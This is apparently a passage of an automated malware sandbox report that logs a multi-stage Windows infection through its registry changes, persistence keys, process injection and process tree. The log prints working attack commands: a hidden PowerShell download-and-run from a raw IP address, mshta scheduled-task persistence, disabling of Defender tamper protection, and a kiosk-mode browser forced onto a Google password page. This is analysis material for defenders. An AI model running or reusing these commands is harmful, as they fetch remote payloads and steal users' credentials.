| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b9d8483ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\5b9d8483ee.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccfa1d9368.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\ccfa1d9368.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d9f9e120ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\d9f9e120ef.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\823a6efeda.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\823a6efeda.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\84mBY8Tm\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c1e74e5ed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\1c1e74e5ed.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1480 set thread context of 1712 | N/A | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe |
| PID 860 set thread context of 3308 | N/A | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4352 set thread context of 3620 | N/A | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 6120 set thread context of 2504 | N/A | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe |
| PID 4484 set thread context of 628 | N/A | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe
"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"
C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
"C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
"C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
"C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "aPbClmaJWPb" /tr "mshta \"C:\Temp\iH0BXcodL.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\iH0BXcodL.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
"C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"
C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe
"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1480 -ip 1480
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 812
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe
"C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe"
C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe
"C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe
"C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe"
C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe
"C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe
"C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8990b8ae-a833-4c44-841c-ae4a0209ca20} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0b6ece7-2e68-4d23-b9c6-0fdff8149e46} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 3272 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db327ae-8c4b-4101-bb8e-4cdbd912e4cd} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3860 -childID 2 -isForBrowser -prefsHandle 3916 -prefMapHandle 3912 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {126f1331-6857-434e-8479-8268beb7cd40} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4688 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4660 -prefMapHandle 4680 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5612e1bc-18af-40e5-9eed-f1310f5806d1} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" utility
C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe
"C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5248 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3950ba0-39ce-44ba-b6ea-5a025ad51a17} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4388 -childID 4 -isForBrowser -prefsHandle 5164 -prefMapHandle 5260 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4e1e00e-06e6-4fc0-a4e5-65aa0706e0f7} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5532 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6a37b2c-4e4b-4551-845a-73f50c1d5581} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe
"C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe"
C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe
"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"
C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe
"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe
"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6120 -ip 6120
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 800
C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe
"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4484 -ip 4484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 808
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
